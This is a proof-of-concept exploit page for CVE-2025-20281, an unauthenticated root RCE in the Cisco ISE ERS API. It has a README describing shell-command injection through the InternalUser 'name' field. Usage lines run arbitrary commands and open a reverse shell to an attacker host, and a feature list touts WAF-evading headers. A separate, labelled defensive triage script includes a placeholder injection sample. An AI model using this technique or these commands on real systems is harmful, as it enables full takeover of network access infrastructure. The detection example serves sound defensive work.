CVE-2025-20281 PoC — Cisco ISE API Unauthenticated Remote Code Execution Vulnerability

Associated Vulnerability
Title: Cisco ISE API Unauthenticated Remote Code Execution Vulnerability (CVE-2025-20281)
Description: A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device.
Description
Unauthenticated Remote Code Execution exploit for CVE-2025-20281 in Cisco ISE ERS API. Execute commands or launch reverse shells as root — no authentication required.
Readme
# CVE-2025-20281 — Cisco ISE ERS API Unauthenticated RCE Exploit

This repository contains a Python 3 proof-of-concept exploit for **CVE-2025-20281**, a critical vulnerability in **Cisco Identity Services Engine (ISE)** that allows **unauthenticated remote code execution (RCE) as root** via the ERS API.

---

## 🩻 Vulnerability Overview

> The Cisco ISE ERS `/ers/sdk#_` endpoint fails to validate authentication when processing user creation requests.  
> By injecting shell commands into the `name` parameter of the `InternalUser` object, attackers can achieve command execution as root.

- **CVE ID**: [CVE-2025-20281](https://nvd.nist.gov/vuln/detail/CVE-2025-20281)
- **Affected**: Cisco ISE PAN (Policy Admin Node) with ERS enabled
- **Severity**: Critical (CVSS 9.8)
- **Authentication**: None required
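
The following added example (not part of this repository's code) triages parsed HTTP request records the way a log pipeline or reverse proxy rule could: it flags ERS requests that carry no `Authorization` header and `InternalUser` names that fail an allowlist. The record layout, the `/ers/` prefix match, the allowed character set and the sample records are assumptions constructed for illustration.

```python
import json
import re

# Assumption: legitimate internal user names need only these characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9._@-]{1,64}")

def triage(record):
    """Return a list of findings for one parsed HTTP request record."""
    findings = []
    # Assumption: ERS API requests are identified by the /ers/ path prefix.
    if not record["path"].startswith("/ers/"):
        return findings
    headers = {k.lower(): v for k, v in record["headers"].items()}
    if "authorization" not in headers:
        findings.append("unauthenticated-ers-request")
    try:
        body = json.loads(record["body"] or "{}")
    except ValueError:
        # A body that does not parse is reported rather than silently skipped.
        findings.append("unparseable-body")
        return findings
    user = body.get("InternalUser") if isinstance(body, dict) else None
    if isinstance(user, dict):
        name = user.get("name")
        # Allowlist check: anything outside the expected set is rejected,
        # which covers shell metacharacters without enumerating them.
        if not isinstance(name, str) or not SAFE_NAME.fullmatch(name):
            findings.append("internaluser-name-rejected")
    return findings

def scan(records):
    """Return (index, findings) for every record with at least one finding."""
    return [(i, f) for i, r in enumerate(records) if (f := triage(r))]

# Constructed sample records (not captured traffic).
SAMPLES = [
    {"path": "/ers/sdk", "headers": {"Authorization": "Basic <redacted>"},
     "body": '{"InternalUser": {"name": "jsmith"}}'},
    {"path": "/ers/sdk", "headers": {"Accept": "application/json"},
     "body": '{"InternalUser": {"name": "jsmith; <command>"}}'},
    {"path": "/ers/sdk", "headers": {}, "body": "{not json"},
    {"path": "/admin/login", "headers": {}, "body": ""},
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLES):
        print(idx, found)
```
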

---

## ⚙️ Features

- ✅ Run arbitrary commands (`--cmd`)
- ✅ Quick test with `--whoami`
- ✅ Launch reverse shells (`--reverse`)
- ✅ No authentication or session token required
- ✅ SSL warning suppression and clean output
- ✅ Legitimate headers to bypass simple WAFs

---

## 🚀 Usage

```bash
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
```

### Examples

Test command:
```bash
python3 CVE-2025-20281.py 192.168.1.10 --whoami
```
Run custom command:
```bash
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
```
Reverse shell:
```bash
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
```

---

## ⚠️ Legal Disclaimer

This code is provided for educational and authorized testing purposes only.
Do not use this software against networks or systems you do not own or have permission to test.

---

## 🙏 Credits

Vulnerability: Disclosed via Cisco advisory

PoC Refactor: illdeed

File Snapshot

```
[4.0K] /data/pocs/471a0aef8af35d866b84fc39e2827864013870c6
├── [2.2K] CVE-2025-20281.py
├── [1.0K] LICENSE
└── [1.7K] README.md

0 directories, 3 files
```